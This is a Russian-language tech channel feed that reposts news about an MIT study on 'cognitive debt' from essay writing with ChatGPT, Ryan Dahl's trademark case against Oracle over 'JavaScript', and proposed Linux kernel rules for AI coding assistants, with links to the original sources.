В эксперименте участвовали 54 человека в возрасте от 18 до 39 лет. Все они были носителями английского языка и не имели опыта профессионального копирайтинга. Участников разделили на три группы. Первая писала эссе с помощью ChatGPT, вторая использовала традиционный Google-поиск (без доступа к AI-ответам), третья полагалась только на собственные знания. Темы эссе были близки к тем, что встречаются в тестах SAT, например: «Следует ли измерять успех только через карьеру?» или «Имеет ли неудача ценность?».
. . .
Результаты оказались однозначными. Участники, писавшие с помощью ChatGPT, демонстрировали самую низкую нейронную активность в ключевых областях, отвечающих за внимание, рабочую память и контроль. ЭЭГ фиксировала снижение активности в альфа- и бета-диапазонах, а также уменьшение связности между лобными и теменными участками мозга. В то же время участники, писавшие без помощи нейросети, показывали более активное и устойчивое включение мозга на протяжении всей сессии.

Разница особенно проявилась в четвёртой сессии. Те, кто сначала использовал ChatGPT, а потом писал без него, сохраняли низкую вовлечённость: мозг словно «отвыкал» от работы. Участники хуже запоминали написанное — в среднем только 28% могли воспроизвести хотя бы одно предложение из собственного эссе. У тех, кто всё время работал без ИИ, этот показатель был вдвое выше.
. . .
Исследователи описывают этот эффект как когнитивный долг — уменьшение умственного участия в моменте снижает способность к обучению и формированию устойчивых навыков в дальнейшем. Иными словами, ChatGPT действительно помогает упростить процесс письма, но делает его более поверхностным с точки зрения мозговой активности и долгосрочного запоминания.

Авторы подчёркивают: нейросети — не зло и не угроза, но их регулярное использование требует осторожности, особенно в образовании. «LLM могут быть полезны как поддержка, но не как костыль. В противном случае они ослабляют именно те когнитивные функции, ради которых мы и учимся», — резюмируют исследователи.

Анонс на сайте MIT
Your Brain on ChatGPT
https://www.media.mit.edu/projects/your-brain-on-chatgpt/overview/

Сайт исследования
Your Brain on ChatGPT: Accumulation of Cognitive Debt when Using an AI Assistant for Essay Writing Task
https://www.brainonllm.com/

Исследование (положу так же в комменты)
https://arxiv.org/pdf/2506.08872

ЗЫ Жду комментарии про калькуляторы, Гугл, ручки и что там принято ещё писать в таких случаях 🌝

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

▪️Генерируй картинки в боте:
Flux + MidJourney v7

Автор Node.js добивается отмены торговой марки JavaScript
https://www.opennet.ru/opennews/art.shtml?num=63494

Райан Даль (Ryan Dahl), создатель JavaScript-платформ Node.js и Deno, добивается отзыва у компании Oracle торговой марки "JavaScript". Первым шагом стала публикация в прошлом году открытого письма к компании Oracle c призывом отказаться от торговой марки JavaScript, так как данное слово стало общеупотребительным термином, не связанным с конкретными продуктами Oracle и широко используемым людьми и компаниями.

Компания Oracle никак не отреагировала на призыв и Райан попытался добиться отмены торговой марки в Агентстве по патентам и товарным знакам США (USPTO). В Апелляционный совет по товарным знакам (TTAB) было направлено ходатайство об отмене торговой марки, в котором были указаны три претензии: введение в заблуждение при продлении торговой марки, использование торговой марки на термин общего назначения и неиспользование торговой марки в продуктах её владельца.

Несколько дней назад Апелляционный совет отклонил первую претензию, суть которой в том, что во время продления своих прав на торговую марку "JavaScript" в 2019 году компания Oracle ввела USPTO в заблуждение и указала сведения, не соответствующие действительности. В качестве демонстрации своих продуктов, использующих торговую марку "JavaScript", компания Oracle привела скриншот с сайта платформы Node.js, которая никак не связана c Oracle и никогда не была её продуктом.

Решено сосредоточить усилия на оставшихся двух претензиях - общем характере термина "JavaScript" и неиспользовании торговой марки в продуктах Oracle:

- Слово "JavaScript" повсеместно используется для описания языка программирования, определяемого спецификацией ECMA-262, а не бренда или продукта компании Oracle, которая никак не связана с эволюцией языка JavaScript. Термин JavaScript используется миллионами разработчиков по всему миру, независимо от Oracle.

- Торговая марка "JavaScript" досталась компании Oracle вместе с активами Sun Microsystems и на практике напрямую не ассоциируется ни с одним из продуктов Oracle.
. . .
Отмечается, что наличие действующей торговой марки вынуждает компании, развивающие продукты, связанные с языком JavaScript, действовать в серой зоне, используя данное название постольку, поскольку компания Oracle пока не заявляет никаких требований. 

Оригинал
JavaScript™ Trademark Update
https://deno.com/blog/deno-v-oracle4

_______
Источник | #tech_b0lt_Genona
@F_S_C_P

-------
Поддержи канал подпиской
-------

Представлены правила для AI-ассистентов, применяемых при разработке ядра Linux
https://www.opennet.ru/opennews/art.shtml?num=63631

Определены следующие ключевые принципы для AI:

- Перед созданием изменений необходимо прочитать документацию и следовать изложенным в ней требованиям.
- Следует выполнять требования по стилю и оформлению кода для ядра.
- Перед отправкой изменения его нужно тщательно протестировать.
- К коду нужно приложить понятное и исчерпывающее сообщение с описанием изменения.
- Изменения не должны нарушать работу компонентов в пространстве пользователя.
- В качестве соавтора изменения должен быть отмечен AI, не ограничиваясь только упоминанием разработчика, использовавшего AI-ассистент.

Документация, которую должен учитывать AI-ассистент:

- Руководство, как стать разработчиком ядра.
- Информация о процессе разработки ядра.
- Руководство по передаче своего кода в ядро.
- Чек-лист проверок перед отправкой кода в ядро.
- Требования к стилю и оформлению кода (использование табуляции для выравнивания, не больше 80 символов в строке, отдельные правила форматирования функций и условных выражений).
- Требования к языкам программирования и стандартам.
- Запрет использования устаревших программных интерфейсов и возможностей.
- Правила отправки патчей для включения в ядро.
- Настройки почтового клиента для отправки патчей.
- Правила приёма патчей.
- Правила лицензирования кода для ядра (лицензия GPL-2.0 c исключениями для системных вызовов, наличие SPDX-идентификаторов лицензии в каждом файле).
- Инструкция по добавлению нового системного вызова.
- Правила для отправки патчей к стабильным веткам ядра.
- Обработка проблем с безопасностью.
- Действия при выявлении регрессий.
- Руководство по взаимодействию с сопровождающими.
- Руководства, специфичные для подсистем.

Для выделения изменений, подготовленных с использованием AI, к коммиту предписывается прикреплять тег "Co-developed-by: $AI_NAME $AI_MODEL $AI_VERSION". Например: "Co-developed-by: Claude claude-3-opus-20240229", "Co-developed-by: GitHub-Copilot GPT-4 v1.0.0" и "Co-developed-by: Cursor gpt-4-turbo-2024-04-09". При этом AI-ассистент не должен добавлять себя в тег "Signed-off-by".

Вообще, судя по списку, проще отказаться от использования AI-ассистентов, чем контролировать соблюдение ими всех требований 🌝

Оригиналы сообщений
https://lore.kernel.org/lkml/[email protected]/
https://lore.kernel.org/lkml/[email protected]/
https://lore.kernel.org/lkml/[email protected]/

_______
Источник | #tech_b0lt_Genona